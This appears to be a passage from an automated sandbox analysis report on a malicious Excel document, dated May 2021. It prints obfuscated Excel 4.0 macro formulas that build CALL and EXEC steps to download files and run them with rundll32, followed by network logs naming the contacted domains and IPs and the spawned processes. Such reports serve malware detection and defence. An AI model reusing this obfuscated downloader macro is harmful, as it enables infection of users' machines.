XMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                    "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                    "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 13, 2021 05:16:15.570801020 CEST49167443192.168.2.22108.167.180.130
                    May 13, 2021 05:16:15.739686966 CEST44349167108.167.180.130192.168.2.22
                    May 13, 2021 05:16:15.739849091 CEST49167443192.168.2.22108.167.180.130
                    May 13, 2021 05:16:15.749993086 CEST49167443192.168.2.22108.167.180.130
                    May 13, 2021 05:16:15.918629885 CEST44349167108.167.180.130192.168.2.22
                    May 13, 2021 05:16:15.926552057 CEST44349167108.167.180.130192.168.2.22
                    May 13, 2021 05:16:15.926589012 CEST44349167108.167.180.130192.168.2.22
                    May 13, 2021 05:16:15.926605940 CEST44349167108.167.180.130192.168.2.22
                    May 13, 2021 05:16:15.926745892 CEST49167443192.168.2.22108.167.180.130
                    May 13, 2021 05:16:15.960908890 CEST49167443192.168.2.22108.167.180.130
                    May 13, 2021 05:16:16.141896009 CEST44349167108.167.180.130192.168.2.22
                    May 13, 2021 05:16:16.142082930 CEST49167443192.168.2.22108.167.180.130
                    May 13, 2021 05:16:17.794972897 CEST49167443192.168.2.22108.167.180.130
                    May 13, 2021 05:16:18.007582903 CEST44349167108.167.180.130192.168.2.22
                    May 13, 2021 05:16:18.380754948 CEST44349167108.167.180.130192.168.2.22
                    May 13, 2021 05:16:18.380767107 CEST44349167108.167.180.130192.168.2.22
                    May 13, 2021 05:16:18.380958080 CEST49167443192.168.2.22108.167.180.130
                    May 13, 2021 05:16:18.381586075 CEST49167443192.168.2.22108.167.180.130
                    May 13, 2021 05:16:18.460218906 CEST49170443192.168.2.22208.91.198.131
                    May 13, 2021 05:16:18.549998045 CEST44349167108.167.180.130192.168.2.22
                    May 13, 2021 05:16:18.644145012 CEST44349170208.91.198.131192.168.2.22
                    May 13, 2021 05:16:18.644336939 CEST49170443192.168.2.22208.91.198.131
                    May 13, 2021 05:16:18.644867897 CEST49170443192.168.2.22208.91.198.131
                    May 13, 2021 05:16:18.825505972 CEST44349170208.91.198.131192.168.2.22
                    May 13, 2021 05:16:18.835638046 CEST44349170208.91.198.131192.168.2.22
                    May 13, 2021 05:16:18.835669041 CEST44349170208.91.198.131192.168.2.22
                    May 13, 2021 05:16:18.835683107 CEST44349170208.91.198.131192.168.2.22
                    May 13, 2021 05:16:18.835853100 CEST49170443192.168.2.22208.91.198.131
                    May 13, 2021 05:16:18.889534950 CEST49170443192.168.2.22208.91.198.131
                    May 13, 2021 05:16:19.064502001 CEST44349170208.91.198.131192.168.2.22
                    May 13, 2021 05:16:19.064579964 CEST49170443192.168.2.22208.91.198.131
                    May 13, 2021 05:16:19.109901905 CEST49170443192.168.2.22208.91.198.131
                    May 13, 2021 05:16:19.322457075 CEST44349170208.91.198.131192.168.2.22
                    May 13, 2021 05:16:19.525058985 CEST44349170208.91.198.131192.168.2.22
                    May 13, 2021 05:16:19.525242090 CEST49170443192.168.2.22208.91.198.131
                    May 13, 2021 05:16:19.525374889 CEST44349170208.91.198.131192.168.2.22
                    May 13, 2021 05:16:19.525437117 CEST49170443192.168.2.22208.91.198.131
                    May 13, 2021 05:16:19.525897980 CEST49170443192.168.2.22208.91.198.131
                    May 13, 2021 05:16:19.697937965 CEST44349170208.91.198.131192.168.2.22

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 13, 2021 05:16:15.496953964 CEST5219753192.168.2.228.8.8.8
                    May 13, 2021 05:16:15.554223061 CEST53521978.8.8.8192.168.2.22
                    May 13, 2021 05:16:16.503516912 CEST5309953192.168.2.228.8.8.8
                    May 13, 2021 05:16:16.553849936 CEST53530998.8.8.8192.168.2.22
                    May 13, 2021 05:16:16.561748981 CEST5283853192.168.2.228.8.8.8
                    May 13, 2021 05:16:16.610579967 CEST53528388.8.8.8192.168.2.22
                    May 13, 2021 05:16:17.147383928 CEST6120053192.168.2.228.8.8.8
                    May 13, 2021 05:16:17.205862045 CEST53612008.8.8.8192.168.2.22
                    May 13, 2021 05:16:17.211152077 CEST4954853192.168.2.228.8.8.8
                    May 13, 2021 05:16:17.268238068 CEST53495488.8.8.8192.168.2.22
                    May 13, 2021 05:16:18.395993948 CEST5562753192.168.2.228.8.8.8
                    May 13, 2021 05:16:18.455827951 CEST53556278.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    May 13, 2021 05:16:15.496953964 CEST192.168.2.228.8.8.80x9610Standard query (0)stateoftheartacademy.com.brA (IP address)IN (0x0001)
                    May 13, 2021 05:16:18.395993948 CEST192.168.2.228.8.8.80x246eStandard query (0)dsafarm.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    May 13, 2021 05:16:15.554223061 CEST8.8.8.8192.168.2.220x9610No error (0)stateoftheartacademy.com.br108.167.180.130A (IP address)IN (0x0001)
                    May 13, 2021 05:16:18.455827951 CEST8.8.8.8192.168.2.220x246eNo error (0)dsafarm.com208.91.198.131A (IP address)IN (0x0001)

                    HTTPS Packets

                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                    May 13, 2021 05:16:15.926605940 CEST108.167.180.130443192.168.2.2249167CN=cpcontacts.stateoftheartacademy.com.br CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Feb 16 13:37:39 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon May 17 14:37:39 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                    May 13, 2021 05:16:18.835683107 CEST208.91.198.131443192.168.2.2249170CN=autodiscover.premieregroup.co.in CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 29 13:33:30 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jul 28 13:33:30 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    Analysis Process: EXCEL.EXE PID: 648 Parent PID: 584

                    General

                    Start time:05:15:42
                    Start date:13/05/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase:0x13f780000
                    File size:27641504 bytes
                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Chronological Activities

                    Analysis Process: rundll32.exe PID: 1984 Parent PID: 648

                    General

                    Start time:05:15:49
                    Start date:13/05/2021
                    Path:C:\Windows\System32\rundll32.exe
                    Wow64 process (32bit):false
                    Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                    Imagebase:0xff290000
                    File size:45568 bytes
                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Chronological Activities

                    Analysis Process: rundll32.exe PID: 2672 Parent PID: 648

                    General

                    Start time:05:15:50
                    Start date:13/05/2021
                    Path:C:\Windows\System32\rundll32.exe
                    Wow64 process (32bit):false
                    Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                    Imagebase:0xff290000
                    File size:45568 bytes
                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Chronological Activities

                    Disassembly

                    Code Analysis

                    Reset < >